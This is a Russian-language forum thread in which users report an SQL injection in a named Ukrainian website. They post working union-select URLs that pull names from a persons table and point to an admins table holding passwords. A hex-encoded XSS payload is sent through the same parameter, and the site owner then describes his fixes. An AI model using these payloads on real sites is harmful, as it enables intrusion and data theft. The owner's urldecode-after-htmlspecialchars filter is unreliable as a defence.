Вот пока найдена скуль иньекция. http://fi-people.org.ua/view.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13/* Очень мало на сайте всего, негде искать!!! А вот и информация через скуль http://fi-people.org.ua/view.php?id=-1%20union%20select%201,name,3,4,5,6,7,8,9,10,11,12,13%20from%20persons/* Ну блин.... только что заметил. Версия мускула 5.*.* поэтому можно увидеть инфу из всех таблиц и ничего не нужно подбирать. Итого: Есть 20 таблиц. Есть таблица admins (правда пока недоступна почемуто) в ней есть поля id,name,password может еще какие я не смотрел. Ну думаю этого хватит.
SIXSS =))) http://fi-people.org.ua/view.php?id=-1+union+select+1,0x3c7363726970743e616c657274282778737327293c2f7363726970743e,3,4,5,6,7,8,9,10,11,12,13/*
Попробуй для устранения SQL-inj использовать PHP: $_GET['id'] = preg_replace('/[^0-9]/','',$_GET['id']); просто прикольный метод... сорри за оффтоп
Спасибо всем, кто ответил(всем атплюсовал). А переменные я немного по-дрому фильтровал $id = urldecode(htmlspecialchars($id = $_POST['id'], ENT_QUOTES));
ЗЫ. Поправил ещё кое-что. Теперь за незатверждённых людей нельзя ни голосовать ни просматривать информацию о них.
